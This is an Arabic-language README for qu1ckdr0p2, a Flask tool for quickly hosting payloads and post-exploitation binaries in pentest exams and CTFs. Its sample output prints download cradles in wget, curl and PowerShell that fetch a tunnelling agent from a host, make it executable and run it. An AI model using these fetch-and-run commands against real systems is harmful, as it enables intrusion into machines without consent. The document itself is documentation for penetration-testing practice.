
قم بتقديم الملفات بسرعة عبر http أو https باستخدام flask.
استضافة سريعة للحمولات (payloads) والملفات الثنائية بعد الاستغلال (post-exploitation bins) عبر HTTP أو HTTPS.
صُمم لاستخدامه في اختبارات مثل OSCP / PNPT أو تحديات CTFs مثل HTB / إلخ.
طُلب السحب (Pull requests) وقضايا (issues) مرحب بها. كما أن أي مساهمات مرحب بها.
يأتي qu1ckdr0p2 مع ميزة الاسم المستعار والبحث (alias and search feature). توجد الأدوات في مستودع qu1ckdr0p2-tools. افتراضياً يقوم بإنشاء شهادة موقعة ذاتياً (self-signed certificate) لاستخدامها عند استخدام خيار --https، كما تُعطى الأولوية لواجهة tun0 عندما يعمل خادم الويب، وإلا سيستخدم eth0.
يُعرّف ملف common.ini الأسماء المستعارة المعيّنة (mapped aliases) المستخدمة ضمن الخيارات --search و -u.
عندما يعمل خادم الويب، تُطبع عدة قوالب تنزيل (download cradles) على الشاشة لنسخها ولصقها.
عند نسخ ولصق قالب تنزيل، اعتماداً على محرر الطرفية (terminal emulator) الذي تستخدمه، قد تحتاج إلى الضغط بسرعة ثلاث مرات أو نقرتين على قالب التنزيل لتظليله للنسخ. سيتم إصلاح هذا في إصدار لاحق.
pip3 install qu1ckdr0p2
echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc
أو
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc
serv init --update
$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080
$ serv --help
Usage: serv [OPTIONS] COMMAND [ARGS]...
Welcome to qu1ckdr0p2 entry point.
Options:
--debug Enable debug mode.
--help Show this message and exit.
Commands:
init Perform updates.
serve Serve files.
$ serv serve --help
Usage: serv serve [OPTIONS]
Serve files.
Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help
Usage: serv init [OPTIONS]
Perform updates.
Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self
أرقام الأسماء المستعارة المُعيّنة لخيار -u ديناميكية، لذا لا تحتاج إلى تذكر أرقام محددة أو كتابة اسم أداة كامل.
$ serv serve --search ligolo
[→] المسار: ~/.qu1ckdr0p2/windows/agent.exe
[→] الاسم المستعار: ligolo_agent_win
[→] الاستخدام: 1
[→] المسار: ~/.qu1ckdr0p2/windows/proxy.exe
[→] الاسم المستعار: ligolo_proxy_win
[→] الاستخدام: 2
[→] المسار: ~/.qu1ckdr0p2/linux/agent
[→] الاسم المستعار: ligolo_agent_linux
[→] الاستخدام: 3
[→] المسار: ~/.qu1ckdr0p2/linux/proxy
[→] الاسم المستعار: ligolo_proxy_linux
[→] الاستخدام: 4
(...)
$ serv serve --search ligolo -u 3 --http 80
[→] الخدمة: ../../.qu1ckdr0p2/linux/agent
[→] البروتوكول: http
[→] عنوان IP: 192.168.1.5
[→] المنفذ: 80
[→] الواجهة: eth0
[→] CTRL+C للإنهاء
[→] الرابط: http://192.168.1.5:80/agent
[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
⠧ خادم الويب قيد التشغيل
MIT